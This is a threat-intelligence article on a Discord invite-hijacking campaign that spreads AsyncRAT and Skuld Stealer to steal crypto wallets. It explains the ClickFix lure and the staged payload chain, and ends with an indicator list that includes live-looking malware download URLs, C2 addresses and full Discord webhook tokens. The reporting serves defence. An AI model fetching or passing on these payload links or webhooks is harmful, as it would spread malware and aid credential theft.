How Malware Uses Discord to Take Control and Steal Cryptocurrency Wallets

Campaign Overview

Recently, cybersecurity experts discovered a dangerous attack campaign called "Invite link hijacking" on the Discord platform to spread malware. The ultimate goal is to steal sensitive information, especially users' cryptocurrency wallets. Hackers exploit expired or deleted invite codes to redirect users to malicious servers containing spyware and remote access trojans.

This campaign uses two main types of malware:

• AsyncRAT: A powerful open-source remote access trojan (RAT).

• Skuld Stealer: A specialized information-stealing software targeting browsers, cryptocurrency wallets, and login credentials.

According to analysis by security experts at Check Point, the ongoing attack campaign has affected at least 1,300 users worldwide, with the most reports coming from the United States, United Kingdom, France, the Netherlands, and Germany.

AsyncRAT và Skuld Stealer – Hai công cụ nguy hiểm

AsyncRAT:

• Allows attackers to:

  • Monitor users remotely.

  • Record keystrokes (keylogger).

  • Access webcam and microphone.

  • Upload or download files.

• Open-source, easy to customize.

Skuld Stealer:

• Main goal: steal sensitive information.

• Capabilities:

  • Extract cryptocurrency wallets from browsers (Chrome, Edge, Brave…).

  • Retrieve login data, cookies, Discord tokens.

  • Extract files from wallet directories (MetaMask, Exodus, Atomic…).

  • Send stolen information to the C2 server via webhook or TCP.

What is a Discord Invite Link?

"Discord Invite Link" is a special link created to invite others to join a Discord server. It looks like: “https://discord.gg/abc123”

When a user clicks on this link, they will:

• Join a Discord server (if they haven't joined yet).

• Gain immediate access to the community if no verification is required.

For this reason, if the link expires or is no longer used, attackers can take over the invite code to redirect users to a malicious server, where they can execute and escalate privileges to steal the sensitive information they desire.

How Attackers Operate

1. Initial Intrusion

• Initially, hackers will send expired and altered Discord invite links through legitimate groups to trick users. When users click on the shared link, they are unknowingly redirected to a malicious Discord server.

• When users click the "verify" button, they immediately authorize the BOT and are redirected to a malicious website “https://captchaguard[.]me“. Here, the BOT gains access to user profile details, such as username, avatar, and Discord banner.

• After authorizing the BOT, Discord will start the OAuth2 authentication flow and create a URL: https://captchaguard.me/oauth-pass?code=zyA11weHhTZxaY3Fs3EWBg6qfO7t6j. Then the server continues to redirect the user to another URL with the format: https://captchaguard[.]me/?key=aWQ9dXNlcm5hbWUyMzQ0JnRva2VuPTExMjIzMzQ0MDEyMz…. These are all phishing sites mimicking Discord/UI CAPTCHA.

• As soon as the user clicks the "Verify" button, a PowerShell script will silently run on the user's machine to download and execute remote malware.

• Here, hackers will also use a technique called “ClickFix” to trick users into thinking their application is broken and needs to be fixed by following the steps in the message. Hackers will ask users to open Windows Run (Win + R) and paste the hacker's code. This will cause the user's machine to download a PowerShell script from the address https://pastebin[.]com/raw/zW0L2z2M.

• A piece of malicious PowerShell script is clearly designed to hide the PowerShell window, download an executable (EXE) file from GitHub, and run it silently on the victim's system. Additionally, hackers can deploy payloads (RAT, stealer...).

• In the attack campaign, experts also discovered some links containing addresses for malware installation files.

  • https://github[.]com/frfs1/update/raw/refs/heads/main/installer.exe

  • https://github[.]com/shisuh/update/raw/refs/heads/main/installer.exe

  • https://github[.]com/gkwdw/wffaw/raw/refs/heads/main/installer.exe

  • https://codeberg[.]org/wfawwf/dwadwaa/raw/branch/main/installer.exe

• In addition to Installer.exe downloading the payload from Bitbucket, there will be 2 malicious VBScript files created and executed by the attacker with the main purposes of evading security, establishing persistence, and creating and executing configuration files.

• When these malicious files are launched, the accompanying payloads are immediately downloaded from Bitbucket:

  • https://bitbucket.org/syscontrol6/syscontrol/downloads/skul.exe

  • https://bitbucket.org/syscontrol6/syscontrol/downloads/Rnr.exe

• The next step for the hacker is to download a malicious file Rnr.exe, similar to the installer.exe file, to download additional malicious payloads. This payload will perform the following tasks:

  • Decode XOR binary data.

  • Write the payload to AppData.

  • Download malware from Bitbucket.

  • Manipulate vtable (possibly obfuscation or anti-debugging).

  • Run the payload silently through a task or script.

2. Deploying Payload

• During the campaign, experts found two payloads related to Skuld Stealer and AsyncRAT deployed by the attacker on the victim's machine. First, the payload: AClient.exe (AsyncRAT) will be launched, allowing the attackers to:

  • Execute arbitrary commands and scripts.

  • Perform keylogging and take screenshots.

  • Manage files (upload, download, delete files).

  • Access remote desktop and camera.

All the data collected will be sent by the hacker to a malicious C&C address: 101.99.76.120

• Next, the second payload is also executed: skul.exe (Skuld Stealer). The special features of this payload include:

  • Anti-debugging.

  • Detecting virtual machines and evading Sandbox systems.

  • Stealing information from Chrome-based browsers such as logins, cookies, credit cards, and browsing history.

  • Crypto clipper (replacing clipboard content with cryptocurrency addresses controlled by the attacker).

  • Stealing Discord authentication tokens.

  • Blocking sensitive user activities like logging in, changing passwords, adding payment information, preventing device view requests, and blocking QR logins.

  • Collecting sessions from popular gaming platforms (Epic Games, Minecraft, Riot Games, Uplay).

  • Gathering system information (CPU, GPU, RAM, IP, geolocation, Wi-Fi network).

  • Stealing cryptocurrency wallet data, including seed phrases and passwords.

• The most dangerous aspect of skul.exe is that it targets the victim's cryptocurrency wallet. It will download malicious .asar files from the following sources:

  • https://github.com/hackirby/wallets-injection/raw/main/atomic.asar

  • https://github.com/hackirby/wallets-injection/raw/main/exodus.asar

• After these files are downloaded, they create fake wallet licenses and encrypt them. Of course, to decrypt them, the hacker has also prepared a sophisticated Exodus wallet stealer script, hiding a webhook in a legitimate file to extract mnemonics/passwords, then sending them to the attacker via Discord. It exploits the wallet's open-source code to access sensitive data as soon as the user unlocks the wallet.

Conclusion

This campaign is a typical example of exploiting community trust (Discord) to deploy a phishing + multi-stage malware strategy targeting cryptocurrency. The attacker used various sophisticated techniques such as hijacking invite links, fake servers, ClickFix, and downloading and deploying malicious PowerShell.

These actions are truly dangerous if not detected in time. Good defense and integrating monitoring systems to protect both personal and organizational systems are necessary in the face of increasing cyber threats.

Recommendations

1. Block malicious Discord domains and links

• Monitor and filter DNS to detect abused Discord domains such as:

  • discord.com/invite/<code>

  • cdn.discordapp.com/...

• Configure proxy/firewall to block access to unauthorized Discord links in the enterprise environment.

2. Do not trust Discord invites from unknown sources

• Warn users not to click on Discord invites coming from:

  • Strange emails, spam.

  • Pop-up ads, YouTube channels, download blogs.

• Enhance user awareness about malware potentially hiding behind seemingly legitimate Discord links.

3. Limit script execution rights

• Configure systems to:

  • Disallow users from executing .vbs, .ps1, .js from directories like Downloads, AppData.

  • Use AppLocker or Windows Defender Application Control (WDAC) to control scripts.

4. Regularly update systems and applications

• Many malware exploit vulnerabilities in outdated software to execute malicious code or escalate privileges.

• Maintain a regular update policy for operating systems and browsers.

IOC

1. Hashes

   • 673090abada8ca47419a5dbc37c5443fe990973613981ce622f30e83683dc932

   • 160eda7ad14610d93f28b7dee20501028c1a9d4f5dc0437794ccfc2604807693

   • 5d0509f68a9b7c415a726be75a078180e3f02e59866f193b0a99eee8e39c874f

   • 375fa2e3e936d05131ee71c5a72d1b703e58ec00ae103bbea552c031d3bfbdbe

   • 53b65b7c38e3d3fca465c547a8c1acc53c8723877c6884f8c3495ff8ccc94fbe

   • d54fa589708546eca500fbeea44363443b86f2617c15c8f7603ff4fb05d494c1

   • 670be5b8c7fcd6e2920a4929fcaa380b1b0750bfa27336991a483c0c0221236a

   • 8135f126764592be3df17200f49140bfb546ec1b2c34a153aa509465406cb46c

   • f08676eeb489087bc0e47bd08a3f7c4b57ef5941698bc09d30857c650763859c

   • db1aa52842247fc3e726b339f7f4911491836b0931c322d1d2ab218ac5a4fb08

   • ef8c2f3c36fff5fccad806af47ded1fd53ad3e7ae22673e28e541460ff0db49c

2. Url & Domain

   • Phishing Website:

     • captchaguard[.]me

     • https://captchaguard[.]me/?key=

PowerShell Script:

• https://pastebin[.]com/raw/zW0L2z2M

Bitbucket repositories:

• https://bitbucket[.]org/updatevak/upd/downloads

• https://bitbucket[.]org/syscontrol6/syscontrol/downloads

• https://bitbucket[.]org/updateservicesvar/serv/downloads

• https://bitbucket[.]org/registryclean1/fefsed/downloads

• https://bitbucket[.]org/htfhtthft/simshelper/downloads

First stage downloader:

• https://github[.]com/frfs1/update/raw/refs/heads/main/installer.exe

• https://github[.]com/shisuh/update/raw/refs/heads/main/installer.exe

• https://github[.]com/gkwdw/wffaw/raw/refs/heads/main/installer.exe

Second stage downloader:

• https://bitbucket[.]org/updatevak/upd/downloads/Rnr.exe

• https://bitbucket[.]org/syscontrol6/syscontrol/downloads/Rnr.exe

Skuld stealer:

• https://bitbucket[.]org/updatevak/upd/downloads/skul.exe

• https://bitbucket[.]org/syscontrol6/syscontrol/downloads/skul.exe

AsyncRAT:

• https://bitbucket[.]org/updatevak/upd/downloads/AClient.exe

• https://bitbucket[.]org/syscontrol6/syscontrol/downloads/AClient.exe

AsyncRat Dead Drop Resolver:

• https://pastebin[.]com/raw/ftknPNF7

• https://pastebin[.]com/raw/NYpQCL7y

• https://pastebin[.]com/raw/QdseGsQL

3. C2

   • 101.99.76.120

   • 87.120.127.37

   • 185.234.247.8

   • microads[.]top

4. Skuld Discord Webhooks

   • https://discord[.]com/api/webhooks/1355186248578502736/_RDywh_K6GQKXiM5T05ueXSSjYopg9nY6XFJo1o5Jnz6v9sih59A8p-6HkndI_nOTicO

   • https://discord[.]com/api/webhooks/1348629600560742462/RJgSAE7cYY-1eKMkl5EI-qZMuHaujnRBMVU_8zcIaMKyQi4mCVjc9R0zhDQ7wmPoD7Xp

Reference

1. The Discord Invite Loop Hole Hijacked for Attacks - Check Point Research

2. Discord Invite Link Hijacking Delivers AsyncRAT and Skuld Stealer Targeting Crypto Wallets